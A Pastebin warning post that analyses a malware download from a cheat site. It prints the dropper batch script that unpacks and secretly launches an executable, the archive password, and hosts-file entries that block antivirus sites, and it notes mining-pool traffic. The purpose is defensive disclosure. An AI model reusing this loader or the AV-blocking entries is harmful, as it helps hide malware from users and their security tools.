Advertisement
StopSellingAssVirus

PELCHAT ONECHEAT.CLUB VIRUS PROOF

Mar 30th, 2024
1,741
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
D 3.91 KB | None | 0 0
  1. xD
  2. DO NOT DOWNLOAD  THIS, THIS IS A COMPLETE MALWARE.
  3. Proofs :
  4. Encrypted %temp%\main\main.bat :
  5. 挦獬਍敀档景൦洊摯⁥㔶ㄬര琊瑩敬朠朳㐳㍧朴㐳㑧″㌨朴㐳㑧栵栶㕪樶㘵⥪਍摭攠瑸慲瑣摥਍敲楦敬戮湩映汩⹥楺൰挊污稷攮數攠映汩⹥楺⁰瀭㘲㠴ㄹ㈴㈰㐶㌹㈰㜷㔵㈴㜲㐸ⴠ敯瑸慲瑣摥ഠ昊牯⼠┥⁩湩⠠ⰴㄭㄬ
潤⠠਍慣汬㜠⹺硥⁥⁥硥牴捡整⽤楦敬╟椥種灩ⴠ敯瑸慲瑣摥਍ഩ爊湥映汩⹥楺⁰楦敬戮湩਍摣攠瑸慲瑣摥਍潭敶∠湉瑳污敬⹲硥≥⸠⼮਍摣⸮਍摲⼠⁳焯攠瑸慲瑣摥਍瑡牴扩⬠⁈䤢獮慴汬牥攮數ഢ猊慴瑲∠•䤢獮慴汬牥攮數ഢ挊獬਍捥潨䰠畡据敨⁤䤧獮慴汬牥攮數⸧਍慰獵൥搊汥⼠⁦焯∠湉瑳污敬⹲硥≥਍
  6. Decrypted %temp%\main\main.bat :
  7. cls
  8. @echo off
  9. mode 65 10
  10. title g3g34g34g34g43 (34g34g45h6hj56j56j)
  11. md extracted
  12. ren file.bin file.zip
  13. call 7z.exe e file.zip -p26489142026493027755422784 -oextracted
  14. for /l %%i in (4 -1 1) do (
  15. call 7z.exe e extracted/file_%%i.zip -oextracted
  16. )
  17. ren file.zip file.bin
  18. cd extracted
  19. move "Installer.exe" ../
  20. cd..
  21. rd /s /q extracted
  22. attrib +H "Installer.exe"
  23. start "" "Installer.exe"
  24. cls
  25. echo Launched 'Installer.exe'.
  26. pause
  27. del /f /q "Installer.exe"
  28. file.zip password : 26489142026493027755422784
  29. file.zip tree :
  30. C:.
  31. │   file_4.zip
  32. └───file_4
  33.     │   AntiAV.data
  34.     │   file_3.zip
  35.     │
  36.     └───file_3
  37.         │   file_2.zip
  38.         │
  39.         └───file_2
  40.             │   file_1.zip
  41.             │
  42.             └───file_1
  43.                     Installer.exe
  44. Installer.exe Host File Changes :
  45. 0.0.0.0       avast.com
  46. 0.0.0.0       www.avast.com
  47. 0.0.0.0       totalav.com
  48. 0.0.0.0       www.totalav.com
  49. 0.0.0.0       scanguard.com
  50. 0.0.0.0       www.scanguard.com
  51. 0.0.0.0       totaladblock.com
  52. 0.0.0.0       www.totaladblock.com
  53. 0.0.0.0       pcprotect.com
  54. 0.0.0.0       www.pcprotect.com
  55. 0.0.0.0       mcafee.com
  56. 0.0.0.0       www.mcafee.com
  57. 0.0.0.0       bitdefender.com
  58. 0.0.0.0       www.bitdefender.com
  59. 0.0.0.0       us.norton.com
  60. 0.0.0.0       www.us.norton.com
  61. 0.0.0.0       avg.com
  62. 0.0.0.0       www.avg.com
  63. 0.0.0.0       malwarebytes.com
  64. 0.0.0.0       www.malwarebytes.com
  65. 0.0.0.0       pandasecurity.com
  66. 0.0.0.0       www.pandasecurity.com
  67. 0.0.0.0       surfshark.com
  68. 0.0.0.0       www.surfshark.com
  69. 0.0.0.0       avira.com
  70. 0.0.0.0       www.avira.com
  71. 0.0.0.0       norton.com
  72. 0.0.0.0       www.norton.com
  73. 0.0.0.0       eset.com
  74. 0.0.0.0       www.eset.com
  75. 0.0.0.0       zillya.com
  76. 0.0.0.0       www.zillya.com
  77. 0.0.0.0       kaspersky.com
  78. 0.0.0.0       www.kaspersky.com
  79. 0.0.0.0       usa.kaspersky.com
  80. 0.0.0.0       www.usa.kaspersky.com
  81. 0.0.0.0       dpbolvw.net
  82. 0.0.0.0       www.dpbolvw.net
  83. 0.0.0.0       sophos.com
  84. 0.0.0.0       www.sophos.com
  85. 0.0.0.0       home.sophos.com
  86. 0.0.0.0       www.home.sophos.com
  87. 0.0.0.0       www.adaware.com
  88. 0.0.0.0       adaware.com
  89. 0.0.0.0       www.ahnlab.com
  90. 0.0.0.0       ahnlab.com
  91. 0.0.0.0       www.bullguard.com
  92. 0.0.0.0       bullguard.com
  93. 0.0.0.0       clamav.net
  94. 0.0.0.0       www.clamav.net
  95. 0.0.0.0       www.drweb.com
  96. 0.0.0.0       drweb.com
  97. 0.0.0.0       emsisoft.com
  98. 0.0.0.0       www.emsisoft.com
  99. 0.0.0.0       www.f-secure.com
  100. 0.0.0.0       f-secure.com
  101. 0.0.0.0       www.zonealarm.com
  102. 0.0.0.0       zonealarm.com
  103. 0.0.0.0       www.trendmicro.com
  104. 0.0.0.0       trendmicro.com
  105. 0.0.0.0       www.ccleaner.com
  106. 0.0.0.0       ccleaner.com
  107. 0.0.0.0       www.virustotal.com
  108. 0.0.0.0       virustotal.com
  109. Installer.exe Virus Total : 52/70
  110. Internet Connections :
  111. 167.235.223.40:1123 | de.zephyr.herominers.com (Crypto Mining Malware website) - https://zephyr.herominers.com/
  112. 28.118.140.52.in-addr.arpa
  113. 240.221.184.93.in-addr.arpa
  114. 217.106.137.52.in-addr.arpa
  115. DNS Request
  116. de.zephyr.herominers.com
  117. DNS Response
  118. 167.235.223.40
  119. 40.223.235.167.in-addr.arpa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement